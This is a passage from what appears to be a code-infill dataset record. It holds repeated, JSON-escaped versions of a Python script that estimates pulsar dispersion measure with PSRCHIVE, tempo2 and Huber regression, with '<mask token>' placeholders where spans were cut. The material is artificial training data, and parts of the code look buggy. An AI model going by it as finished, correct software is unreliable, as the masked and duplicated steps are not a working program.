tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n 
ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while 
len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\nmain()\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport numpy as np\nimport psrchive\nimport argparse\nimport time\nimport warnings\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nstart = time.time()\nparser = argparse.ArgumentParser(description='Code for measuring in-band ' +\n 'DM for pulsar data in psrfits format.')\nparser.add_argument('files', nargs='+', type=str, help=\n 'The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, help=\n 'Ephemeris file to update the model. Exits if not ' +\n 'given or is not available in \"PWD/ephemerides\" ' + 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str, help=\n 'Model template for ToA generation. Exits if not ' +\n 'given or is not available in \"PWD/templates\" ' + 'directory')\nparser.add_argument('-f', '--fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f', '--b3fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f', '--b5fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w', '--writeout', action='store_true', help=\n 'Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa', '--print_toas', action='store_true', help=\n 'Print the prefit ToAs to file in tempo2 format. ' + 'Def: False')\nparser.add_argument('-F', '--Fscrunch', action='store_true', help=\n 'Fully scrunch the number of channels for the ' +\n 'final output archive (Def: False)')\nparser.add_argument('-T', '--Tscrunch', action='store_true', help=\n 'Completely time scrunch all the integrations')\nparser.add_argument('-t', '--tscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of integrations for ' +\n 'the final output archive (Def: None)')\nparser.add_argument('-o', '--offset', type=float, default=0.670520675, help\n ='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', help=\n 'Only print warnings')\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + 
'.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... 
'\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... 
'),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 
'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n 
ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while 
len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\nmain()\n",
"step-5": "#!/usr/bin/python\n'''\n ** dmcalc **\nEstimates the Dispersion Measure (DM) from the data in psrfits file format.\n\nReturns the DM value with its uncertainty and reduced chi-square from tempo2 \nDM fit.\n\nDependencies \n-------------\nPSRCHIVE with python interface: http://psrchive.sourceforge.net/\nTEMPO2: https://bitbucket.org/psrsoft/tempo2\nSKLEARN: https://scikit-learn.org/stable/install.html\n\nParameters\n----------\nfile(s) : Input file(s) in psrfits format\n\nephem : Ephemeris (or parameter) file of the pulsar. This is required \n to update the model. It can be given as a command line argument. \n If it is available in \"PWD/ephemerides\" folder, one can use that.\n Giving the file with this option overrides the default one.\n\nmodel : Template profile for cross-correlating with the observation to\n obtain DM. It can be given as a command line argument, otherwise\n it will look for a matching one in \"PWD/ephemerides\" directory\n and if found, will use that instead. One can use this option to\n override the default selection.\n \nfscrunch : int, optional, default: None. Factor for scrunching the frequency \n channels before passing it to DM estimation.\n\nb3fscrunch : int, optional, default: None. Factor for scrunching the BAND3 \n data of uGMRT before passing it to DM estimation.\n\nb3fscrunch : int, optional, default: None. Factor for scrunching the BAND5 \n data of uGMRT before passing it to DM estimation.\n\noffset : float, optional, default: None. Fix for jump between BAND3 and \n BAND5 of uGMRT bands. \n\nwriteout : bool, optional, default: False. Writes out the file corrected \n for DM in a default directory (PWD/PSRJ_{site}_final), using the\n following options to reduce the file.\n\nplot : bool, optional, default: True. Prints the data analysis plot in\n a PDF file. ToA rejection steps and DM corrected ToAs are shown\n in addition to DM corrected frequency evolution of the profile.\n\nptoa : bool, optional, default: False. Prints the outliers cleaned ToAs \n to a file in the TEMPO2 readable format, so that, if required, \n it can be used for other purposes.\n \nFscrunch : bool, optional, default: False. Collapse all frequency channels\n to produce one 